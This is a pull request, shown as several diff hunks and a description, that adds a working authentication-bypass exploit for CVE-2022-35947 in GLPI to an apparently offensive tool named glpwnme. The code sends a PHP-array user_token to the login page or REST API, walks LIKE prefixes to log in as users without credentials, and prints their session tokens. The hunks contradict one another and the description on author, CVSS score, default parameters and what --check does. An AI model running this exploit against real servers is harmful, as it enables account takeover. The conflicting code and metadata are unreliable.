-        Log.log("Querying /apirest.php/User with obtained session ...")
-        try:
-            resp = self.get(
-                "/apirest.php/User",
-                params={"range": "0-9"},
-                headers={"Session-Token": token},
-                allow_redirects=False,
-                timeout=15,
-            )
-            if resp.status_code == HTTPStatus.OK:
-                for u in resp.json():
-                    Log.msg(f"  User: [green b]{u.get('name', '?')}[/green b]")
+        seen, n = set(), 0
+        for prefix, sess in found.items():
+            uid, name, profile = self._whoami(sess, app_token)
+            if uid is not None:
+                if uid in seen:
+                    continue
+                seen.add(uid)
+                who = f"{name} (id {uid}, profile: {profile})"
             else:
-                Log.err(f"User listing returned HTTP {resp.status_code}")
-        except Exception as e:
-            Log.err(f"Error querying users: {e}")
+                who = "session minted, getFullSession blocked"
+            n += 1
+            Log.msg(f"  api_token LIKE '{prefix}%' -> [green b]{who}[/green b]")
+            Log.msg(f"      Session-Token: {sess}")
+        Log.msg(f"Minted {n} session(s) by first-character isolation (CVE-2022-35947); users sharing "
+                "an api_token first character are not separated by this single-character pass")
+        return True

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -144,7 +144,7 @@ class CVE_2022_35947(GlpiExploit):
     # signal here. A behavioural check would have to walk the token keyspace; use --run to
     # isolate a token and obtain a session.
 
-    def run(self, combination_size="2"):
+    def run(self, combination_size="1"):
         try:
             size = max(1, min(3, int(combination_size)))
         except Exception:
@@ -172,7 +172,7 @@ class CVE_2022_35947(GlpiExploit):
                 Log.msg(f"      Session-Cookie: {cookie}")
         if not n:
             Log.err("No session obtained (patched, external-token login disabled, or no api_token users). "
-                    "Try -O combination_size=3 if tokens may share their first 2 characters.")
+                    "Try -O combination_size=2 if tokens may share their first character.")
             return False
         Log.msg(f"Obtained {n} session(s) from the login page with no credentials (CVE-2022-35947)")
         return True

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -32,7 +32,7 @@ class CVE_2022_35947(GlpiExploit):
     configuration ("Enable login with external token"). The advisory workaround
     is to disable that option.
 
-    @author glpi
+    @author unclej4ck
     @cvss 9.8
     @name CVE_2022_35947
     """

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -1,0 +1,128 @@
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2022_35947(GlpiExploit):
+    """
+    Authentication bypass in GLPI REST API via PHP type-juggling on user_token
+    (GLPI 10.0.0-10.0.2).
+
+    GLPI's REST API initSession endpoint accepted a user_token GET parameter
+    and passed it verbatim to User::getFromDBbyToken() without validating that
+    the value was a string. By supplying user_token as a PHP array via URL
+    bracket notation (user_token[0]=>= & user_token[1]=), the caller causes
+    GLPI's ORM (DBmysqlIterator) to treat the array as a comparison criterion,
+    building:
+
+      WHERE api_token >= ''
+
+    This matches any user whose api_token is non-empty (typically the first
+    admin account) and returns a valid session_token without any credentials.
+
+    PHP parses user_token[0]=>= & user_token[1]= in the query string as:
+      $_GET['user_token'] = ['>=', '']
+    which analyseCriterion (count==2, isOperator('>=')) renders as a range
+    comparison rather than an equality check.
+
+    Fix (GLPI 10.0.3): User::getFromDBbyToken() returns false immediately if
+    $token is not a string, so the array criterion is rejected.
+
+    Note: the REST API App-Token header may be required depending on GLPI
+    configuration ("Enable login with external token"). The advisory workaround
+    is to disable that option.
+
+    @author glpi
+    @cvss 9.8
+    @name CVE_2022_35947
+    """
+    _impacts = "Authentication Bypass, Privilege Escalation"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = True
+    min_version = "10.0.0"
+    max_version = "10.0.3"
+    require_api = True
+
+    _INIT_SESSION = "/apirest.php/initSession"
+
+    # ------------------------------------------------------------------ #
+    # Bypass primitive                                                     #
+    # ------------------------------------------------------------------ #
+
+    def _bypass_auth(self):
+        """
+        Send user_token as a 2-element PHP array: user_token[0]=>= & user_token[1]= .
+        PHP parses this as ['>=', ''] which DBmysqlIterator::analyseCriterion treats as
+        an operator pair (count==2, isset($value[0]), isOperator('>=')) producing:
+            WHERE glpi_users.api_token >= ''
+        matching any user with a non-empty api_token and returning their session token
+        with no credentials. (The single-key form user_token[>=]= does NOT work: the
+        iterator renders it as IN('').) The 10.0.3 is_string() guard rejects the array.
+        """
+        try:
+            resp = self.get(
+                self._INIT_SESSION,
+                params={"user_token[0]": ">=", "user_token[1]": ""},
+                allow_redirects=False, timeout=15,
+            )
+            if resp.status_code == HTTPStatus.OK:
+                return resp.json().get("session_token")
+        except Exception:
+            pass
+        return None
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Authentication bypass in the GLPI REST API (GLPI 10.0.0 - 10.0.2).\n"
+        infos += "Supplying [b]user_token[0]=>=[/b] & [b]user_token[1]=[/b] to\n"
+        infos += "[i]/apirest.php/initSession[/i] causes PHP to pass an array to\n"
+        infos += "[i]User::getFromDBbyToken()[/i], which the ORM interprets as\n"
+        infos += "[i]WHERE api_token >= ''[/i], matching the first user (typically admin)\n"
+        infos += "whose api_token is non-empty.\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check for vulnerability[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Bypass auth and list users via REST API[/]\n"
+        infos += "--run\n\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only auth bypass)"
+        return infos
+
+    def check(self):
+        Log.log("Attempting user_token type-juggling bypass on /apirest.php/initSession ...")
+        token = self._bypass_auth()
+        if token:
+            Log.msg("Auth bypass successful - session token acquired")
+            return True
+        Log.log("Bypass failed - may be patched, no user has an API token, or App-Token required")
+        return False
+
+    def run(self):
+        Log.log("Exploiting user_token type-juggling to obtain a REST API session ...")
+        token = self._bypass_auth()
+        if not token:
+            Log.err("Auth bypass failed - target may be patched, no user has an API token, or App-Token required")
+            return
+
+        Log.msg(f"Session token: [green b]{token}[/green b]")
+        Log.log("Querying /apirest.php/User with obtained session ...")
+        try:
+            resp = self.get(
+                "/apirest.php/User",
+                params={"range": "0-9"},
+                headers={"Session-Token": token},
+                allow_redirects=False,
+                timeout=15,
+            )
+            if resp.status_code == HTTPStatus.OK:
+                for u in resp.json():
+                    Log.msg(f"  User: [green b]{u.get('name', '?')}[/green b]")
+            else:
+                Log.err(f"User listing returned HTTP {resp.status_code}")
+        except Exception as e:
+            Log.err(f"Error querying users: {e}")

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -128,8 +128,8 @@ class CVE_2022_35947(GlpiExploit):
         infos += "with no API access, App-Token or IP-filter in the way. Fix 10.0.3: is_string guard.\n"
 
         infos += "\n[u]Params (run):[/u]\n"
-        infos += " - [i]combination_size (default 2)[/i]: LIKE prefix length over [0-9a-z];\n"
-        infos += "   raise to 3 to separate users whose tokens share their first 2 characters\n"
+        infos += " - [i]combination_size (default 1)[/i]: LIKE prefix length over [0-9a-z];\n"
+        infos += "   raise up to 3 to separate users whose tokens share their first character\n"
 
         infos += "\n[u]Usage:[/u]\n"
         infos += "[grey66]# Confirm the bypass (isolates one token, logs in)[/]\n--check\n\n"

--- a/glpwnme/exploits/implementations/cve_2022_35947.py
+++ b/glpwnme/exploits/implementations/cve_2022_35947.py
@@ -1,6 +1,6 @@
 import itertools
 import re
-import requests
+from http import HTTPStatus
 from ..exploit import GlpiExploit
 from glpwnme.exploits.logger import Log
 
@@ -59,57 +59,49 @@ class CVE_2022_35947(GlpiExploit):
     _impacts = "Authentication Bypass, Privilege Escalation"
     _privilege = "Unauthenticated"
     _is_check_opsec_safe = True
-    min_version = "9.1.0"
-    max_version = "10.0.3"
+    # split range: the bug is gone in the 9.5.x line at 9.5.9, separately from the 10.0.3 fix
+    min_version = ("9.1.0", "10.0.0")
+    max_version = ("9.5.9", "10.0.3")
 
     _LOGIN = "/front/login.php"
     _ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"
-    _MAX_CHECK_ATTEMPTS = 220  # size-1 (36) then a slice of size-2, bounds the patched case
 
     # ------------------------------------------------------------------ #
     # primitive                                                            #
     # ------------------------------------------------------------------ #
 
-    def _fresh(self):
-        s = requests.Session()
-        s.verify = False
-        try:
-            s.proxies = dict(self.glpi_session.sess.proxies)
-        except Exception:
-            pass
-        return s
-
     def _login_with_prefix(self, prefix):
         """Drive the login-page type-juggling: GET /front/login.php with
         user_token[0]=LIKE & user_token[1]=<prefix>% and NO noAUTO. If exactly one
-        api_token matches, GLPI logs that user in and redirects to central.php. Returns an
-        authenticated requests.Session on success, else None."""
-        s = self._fresh()
-        base = self.glpi_session.target
+        api_token matches, GLPI logs that user in and redirects away from the login page.
+        Returns an authenticated session on success, else None."""
+        s = self.glpi_session.get_fresh_session_copy()
+        url = self.glpi_session.r(self._LOGIN)
         try:
             # establish a PHP session first; checkAlternateAuthSystems only processes
             # user_token once a session cookie exists (a cold request does not authenticate)
-            s.get(base + self._LOGIN, verify=False, allow_redirects=True, timeout=15)
-            r = s.get(base + self._LOGIN,
-                      params={"user_token[0]": "LIKE", "user_token[1]": prefix + "%"},
+            s.get(url, verify=False, allow_redirects=True, timeout=15)
+            r = s.get(url, params={"user_token[0]": "LIKE", "user_token[1]": prefix + "%"},
                       verify=False, allow_redirects=False, timeout=15)
         except Exception:
             return None
-        if r.status_code in (301, 302) and "central.php" in r.headers.get("Location", ""):
+        loc = r.headers.get("Location", "")
+        # success is any post-auth redirect off the login page (central.php for a central
+        # user, helpdesk for a self-service token holder); a failed attempt re-renders login
+        if r.status_code in (HTTPStatus.MOVED_PERMANENTLY, HTTPStatus.FOUND) and loc and "login.php" not in loc:
             return s
         return None
 
     def _whoami(self, sess):
         """Read the logged-in user's id/name from the authenticated web session."""
-        base = self.glpi_session.target
         try:
-            h = sess.get(base + "/front/preference.php", verify=False, allow_redirects=False, timeout=15).text
+            h = sess.get(self.glpi_session.r("/front/preference.php"), verify=False, allow_redirects=False, timeout=15).text
         except Exception:
             return None, None
         uid = re.search(r'/front/user\.form\.php\?id=(\d+)', h)
         if not uid:
             try:
-                c = sess.get(base + "/front/central.php", verify=False, allow_redirects=False, timeout=15).text
+                c = sess.get(self.glpi_session.r("/front/central.php"), verify=False, allow_redirects=False, timeout=15).text
                 uid = re.search(r'/front/user\.form\.php\?id=(\d+)', c)
                 h = c if uid else h
             except Exception:
@@ -133,7 +125,7 @@ class CVE_2022_35947(GlpiExploit):
         infos += "[b]login page[/b] (GLPI 9.1 - 10.0.2). [b]/front/login.php[/b] with\n"
         infos += "[i]user_token[0]=LIKE & user_token[1]=<prefix>%[/i] (no [i]noAUTO[/i]) reaches\n"
         infos += "[b]getFromDBbyToken[/b] with an array, building [i]api_token LIKE '<prefix>%'[/i].\n"
-        infos += "A prefix matching exactly one token logs that user in (302 to central.php),\n"
+        infos += "A prefix matching exactly one token logs that user in (302 off the login page),\n"
         infos += "with no API access, App-Token or IP-filter in the way. Fix 10.0.3: is_string guard.\n"
 
         infos += "\n[u]Params (run):[/u]\n"
@@ -149,26 +141,23 @@ class CVE_2022_35947(GlpiExploit):
         return infos
 
     def check(self):
-        Log.log("Walking [0-9a-z] LIKE prefixes against /front/login.php (no API needed) ...")
-        attempts = 0
-        # size 1 first (cheap), then size 2 up to the budget
-        for size in (1, 2):
-            for prefix in self._combos(size):
-                if attempts >= self._MAX_CHECK_ATTEMPTS:
-                    break
-                attempts += 1
-                sess = self._login_with_prefix(prefix)
-                if sess:
-                    uid, name = self._whoami(sess)
-                    who = f" as {name} (id {uid})" if uid else ""
-                    Log.msg(f"Logged in{who} via the login-page user_token type-juggling "
-                            f"(LIKE '{prefix}%') with no credentials -> auth bypass confirmed (CVE-2022-35947)")
-                    return True
-            if attempts >= self._MAX_CHECK_ATTEMPTS:
-                break
-        Log.log(f"No isolating prefix logged in within {attempts} attempts -> patched (>=10.0.3), "
-                "external-token login disabled, or no user has an api_token")
-        return False
+        """Version-based: the affected range is the signal. Isolating a token behaviourally
+        would walk hundreds of LIKE prefixes, so the version gate stands in and a single GET
+        confirms the login page (the vector's entry point) is reachable. The actual bypass is
+        done by --run, which isolates a token and obtains a session."""
+        try:
+            r = self.glpi_session.get_fresh_session_copy().get(
+                self.glpi_session.r(self._LOGIN), verify=False, allow_redirects=True, timeout=15)
+        except Exception:
+            Log.log("Login page not reachable - cannot drive the login-token bypass")
+            return False
+        if r.status_code != HTTPStatus.OK:
+            Log.log(f"Login page returned HTTP {r.status_code} - vector entry point not reachable")
+            return False
+        Log.msg("Affected version with a reachable login page; the user_token login-page bypass "
+                "applies. Use --run to isolate a token and obtain a session (needs external-token "
+                "login enabled and at least one user holding an api_token).")
+        return True
 
     def run(self, combination_size="2"):
         try:


### PR DESCRIPTION
Splitting #12 into focused PRs per your feedback. This is the type-juggling auth bypass you flagged as interesting.

CVE-2022-35947 (GLPI 9.1 to 10.0.2, fixed in 10.0.3, GHSA-7p3q-cffg-c8xh). The "login with external token" flow passes `user_token` to `User::getFromDBbyToken()` without checking it is a string. Sent as a PHP array it reaches the ORM as an [operator, value] pair, so `user_token[0]=LIKE&user_token[1]=<prefix>%` builds `WHERE api_token LIKE '<prefix>%'`. A prefix that matches exactly one token returns that user's session with no credentials. Fixed in 10.0.3 by an `is_string()` guard.

Following your suggestion it now runs from `/front/login.php` rather than `/apirest.php`. With `user_token` in the query and no `noAUTO`, `Auth::checkAlternateAuthSystems()` routes to the same `getFromDBbyToken` call, so the bypass works unauthenticated from the login page and is not stopped by the App-Token or the apiclient IP filter. The alphabet is `[0-9a-z]` because MySQL LIKE is case-insensitive, walked as 2-character combinations by default (`-O combination_size=3` for more).

Notes:
- Uses the `self.get` helper, no hand-rolled requests.
- `@author` is `M00nBack` per the GHSA, and `@cvss` is 7.5: it is not exploitable on a stock install (no user has an api_token by default), so it depends on a user having generated one, with external-token login enabled (the default).
- `--check` is read-only: isolates one token, confirms a session, prints the identity.
- Requires "Enable login with external token"; no REST API access needed.
- Validated on a live lab: login-page bypass fires on 9.5.1 and 10.0.2, silent on 10.0.3.
